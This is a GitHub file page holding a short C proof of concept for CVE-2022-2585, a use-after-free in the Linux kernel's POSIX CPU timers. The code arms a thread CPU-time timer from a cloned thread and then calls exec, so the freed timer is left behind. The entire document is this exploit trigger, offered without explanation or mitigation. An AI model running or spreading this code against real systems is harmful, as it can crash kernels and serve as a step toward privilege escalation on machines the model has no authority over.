-
Notifications
You must be signed in to change notification settings - Fork 4
/
CVE-2022-2585.c
46 lines (37 loc) · 977 Bytes
/
CVE-2022-2585.c
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
#define _GNU_SOURCE
#include <sched.h>
#include <time.h>
#include <unistd.h>
#include <sys/wait.h>
#include <stdlib.h>
#include <string.h>
#include <sys/mman.h>
static int timer_uaf(void *d)
{
timer_t tid;
struct itimerspec its;
its.it_interval.tv_sec = 3;
its.it_interval.tv_nsec = 0;
its.it_value.tv_sec = 3;
its.it_value.tv_nsec = 0;
timer_create(CLOCK_THREAD_CPUTIME_ID, NULL, &tid);
timer_settime(tid, 0, &its, NULL);
execlp("./poc", "poc1", NULL);
}
static char stack[8192];
int main(int argc, char **argv)
{
timer_t tid;
int i;
if (!strcmp(argv[0], "poc1")) {
sleep(2);
exit(0);
}
if (fork() > 0) {
waitpid(-1, NULL, 0);
exit(0);
}
clone(timer_uaf, stack+4096, SIGCHLD | CLONE_VM | CLONE_SIGHAND | CLONE_THREAD, NULL, NULL, NULL);
while(1);
return 0;
}